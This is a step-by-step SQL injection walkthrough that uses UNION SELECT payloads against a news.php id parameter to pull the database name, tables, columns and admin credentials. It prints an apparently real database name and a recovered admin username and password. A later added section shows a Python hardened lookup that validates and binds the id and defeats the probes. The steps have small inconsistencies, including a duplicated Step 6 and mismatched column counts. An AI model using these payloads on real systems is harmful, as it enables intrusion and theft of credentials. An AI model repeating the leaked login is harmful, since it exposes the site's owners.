Step 1: Finding Vulnerable Link
www.site.com/news.php?id=3
Add ' after id=3
If an error is shown or a blank page is returned, then the site is vulnerable.

Step 2: Finding Vulnerable Columns
www.site.com/news.php?id=3 order by 8 --
If an error is shown again or a blank page occurs, then the vulnerable columns are 7.

Step 3: Finding Number of Vulnerable Columns:
www.site.com/news.php?id=3 union all select 1,2,3,4,5,6,7 --
If number 2 is shown, then this column is open to SQL Injection and can give us the database, tables & columns.

Step 4: Finding Database
union all select 1,database(),3,4,5,6,7 --
chennaisilks

Step 5: Finding Table Names:
www.site.com/news.php?id=3 union all select 1,table_name,3,4,5,6 from information_schema.tables where table_schema='chennaisilks' --

Step 6: Finding Column Names:
www.site.com/news.php?id=3 union all select 1,column_name,3,4,5,6,7 from information_schema.columns where table_schema='chennaisilks' --
Admin table is admin
Admin columns are:
admin_id
user_id
admin_pwd
admin_email
admin_last_login
admin_ip

Step 6: Finding Admin username & password:
www.site.com/news.php?id=3 union all select 1,user_id,3,4,5,6,7 from admin --
www.site.com/news.php?id=3 union all select 1,admin_pwd,3,4,5,6,7 from admin --
admin:jan10ecom10jan

Step 7: Finding Admin Link:
www.site.com/admin

In case of .php add ' after id=3
In case of .asp add ' or /* or ')
In case of .aspx add ' or /* or ')
In .asp use /* for ending series of commands
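
Every step above depends on the id value being pasted into the SQL text and on database errors reaching the browser. The following is an added example, not code from the original page: a hardened lookup that validates the id and binds it as a parameter, run against the probe values from the steps. Python's sqlite3 stands in for the PHP/MySQL site, and the table layout, sample rows and function names are assumptions made for illustration.

```python
import re
import sqlite3

ID_RE = re.compile(r"[0-9]{1,9}")  # plain ASCII decimal id, nothing else

def make_db():
    """Constructed in-memory stand-in for the news and admin tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admin (user_id TEXT, admin_pwd TEXT);
        INSERT INTO news VALUES (3, 'Constructed headline');
        INSERT INTO admin VALUES ('constructed_user', 'constructed_hash');
    """)
    return conn

def lookup_bound(conn, raw_id):
    """Bind the value: it reaches the database as data, never as SQL text."""
    row = conn.execute(
        "SELECT title FROM news WHERE id = ?", (raw_id,)
    ).fetchone()
    return row[0] if row else None

def get_news(conn, raw_id):
    """Validate first, then bind. Returns the title, or None for 'not found'."""
    if not ID_RE.fullmatch(raw_id):
        # The caller answers with a generic 404: no SQL error text and no
        # blank page that differs from an ordinary missing article.
        return None
    return lookup_bound(conn, int(raw_id))

# id values taken from the steps above
PROBES = [
    "3'",
    "3 order by 8 --",
    "3 union all select 1,2,3,4,5,6,7 --",
    "3 union all select 1,database(),3,4,5,6,7 --",
]

def run_probes():
    """Return what each probe yields from the hardened lookup."""
    conn = make_db()
    return {probe: get_news(conn, probe) for probe in PROBES}

if __name__ == "__main__":
    for probe, result in run_probes().items():
        print(repr(probe), "->", result)
```

Returning the same response for a rejected id and a missing article removes the error-or-blank-page signal that Step 1 and Step 2 rely on.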
